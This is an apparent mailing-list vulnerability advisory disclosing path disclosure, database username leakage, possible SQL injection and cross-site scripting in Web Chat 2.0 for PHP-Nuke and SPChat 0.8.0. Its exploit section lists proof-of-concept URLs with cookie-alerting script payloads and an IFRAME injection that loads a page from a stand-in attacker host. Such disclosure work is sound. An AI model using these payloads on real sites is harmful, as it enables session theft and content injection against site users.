~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Topic: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Systems Affected: Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0
Vendor URL: <http://www.saarport.net>
Vuln Type: XSS (Cross Site Scripting), Path Disclosure, revealed of
DBUser Name, possible injection SQL
Status: Vendor contacted, In a moment estara available the patched
version.
(<http://www.saarport.net/modules.php?name=Forums&file=viewtopic&p=1029>)
Author: XyborG (<http://www.rzw.com.ar>)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Intro:
~~~~~~
SFChat & WebChat are very good and stable systems of chat online. But it
has his faults :)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: The name of the WebChat module can change, I I will use that name.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:
~~~~~~~~~

Vendor has contacted and In a moment estara available the patched version.
To Fix the script temporarily, you must erase this script of your Web, or 
change its name so that nobody has access, but checks the Web of the creator

in search of the new patch, to be able to continue using this service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
~~~~~~~~

Web Chat 2.0 for PHP-Nuke:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclosure (see the source code):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<http://www.victim.com/modules/WebChat/out.php>

----- Source Code -----

<br />
<b>Warning</b>: Access denied for user: 'victim@localhost' <mailto:'victim@localhost'> (Using password:
YES) in
<b>/home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php</b> on line <b>33</b><br />
</TD></TR></TABLE><B>Database error:</B> Link_ID == false, connect
failed<BR>
<B>MySQL error</B>: 0 ()<BR>
Session halted.

----- Source Code -----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path
Disclosure:
~~~~~~~~~~~~~~~~
<http://www.victim.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclorure & revealed of DBUser Name & XSS, SQL Injection?
:
<http://www.victim.com/modules/WebChat/in.php>
<http://www.victim.com/modules/WebChat/quit.php>
<http://www.victim.com/modules/WebChat/users.php>
<http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code>]
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username="><script>alert(document.cookie);</script <http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=>>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SPChat Ver.
0.8.0:
~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=SPChat&file=index&statussess=<IFRAME%20src="http://www.attacker.com.ar/attack.htm"%20marginWidth=0%20marginHeight=0%20frameBorder=0%20width=500%20scrolling=yes%20height=500></IFRAME <http://www.victim.com/modules.php?op=modload&name=SPChat&file=index&statussess=<IFRAME%20src=>>

----- Source Code For attack.htm for eg. -----
?script>
alert(document.cookie);
?/script>
----- Source Code For attack.htm -----

(Note: Replace '?' by '<')

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-- 
XyBOrG
WebMaster de:
www.RZWEB.com.ar <http://www.RZWEB.com.ar>
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more <http://www.gmx.net> +++
Bitte l„cheln! Fotogalerie online mit GMX ohne eigene Homepage!